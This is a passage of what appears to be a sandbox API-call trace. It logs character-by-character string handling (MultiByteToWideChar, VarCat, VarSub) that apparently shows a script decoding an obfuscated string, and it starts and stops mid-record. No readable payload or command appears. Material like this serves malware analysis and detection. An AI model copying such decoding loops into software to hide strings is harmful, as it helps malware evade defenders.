pvarResult=0x28f434) returned 0x0 [0084.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.138] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…", lpUsedDefaultChar=0x0) returned 1 [0084.138] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0084.138] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.139] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.139] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0084.140] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0084.140] VarCat (in: pvarLeft=0x28f5bc, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.141] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.141] VarCat (in: pvarLeft=0x28f5bc, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z", lpUsedDefaultChar=0x0) returned 1 [0084.142] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0084.142] VarCat (in: pvarLeft=0x28f5bc, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.142] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.143] VarCat (in: pvarLeft=0x28f5bc, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.143] VarSub (in: pvarLeft=0x28f48c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.143] VarCat (in: pvarLeft=0x28f5bc, pvarRight=0x28f61c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.144] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.145] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";", lpUsedDefaultChar=0x0) returned 1 [0084.145] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.145] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.146] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.146] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.147] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.147] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t", lpUsedDefaultChar=0x0) returned 1 [0084.148] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0084.148] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0084.149] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0084.149] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.149] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.150] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.150] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.150] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.151] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.151] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.152] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.152] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.152] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.153] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="/", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/", lpUsedDefaultChar=0x0) returned 1 [0084.153] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="\"") returned 1 [0084.153] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U", lpUsedDefaultChar=0x0) returned 1 [0084.154] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0084.154] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X", lpUsedDefaultChar=0x0) returned 1 [0084.155] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0084.155] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0084.155] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.156] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f", lpUsedDefaultChar=0x0) returned 1 [0084.156] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Y", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0084.156] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.157] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.157] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y", lpUsedDefaultChar=0x0) returned 1 [0084.158] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0084.158] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\", lpUsedDefaultChar=0x0) returned 1 [0084.159] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0084.159] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.159] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.160] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0084.160] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0084.160] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y", lpUsedDefaultChar=0x0) returned 1 [0084.161] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0084.161] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.162] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.164] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z", lpUsedDefaultChar=0x0) returned 1 [0084.164] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0084.165] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0084.165] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0084.165] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.166] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.166] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U", lpUsedDefaultChar=0x0) returned 1 [0084.167] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0084.167] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V", lpUsedDefaultChar=0x0) returned 1 [0084.168] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0084.168] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[", lpUsedDefaultChar=0x0) returned 1 [0084.168] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0084.169] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0084.169] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.169] 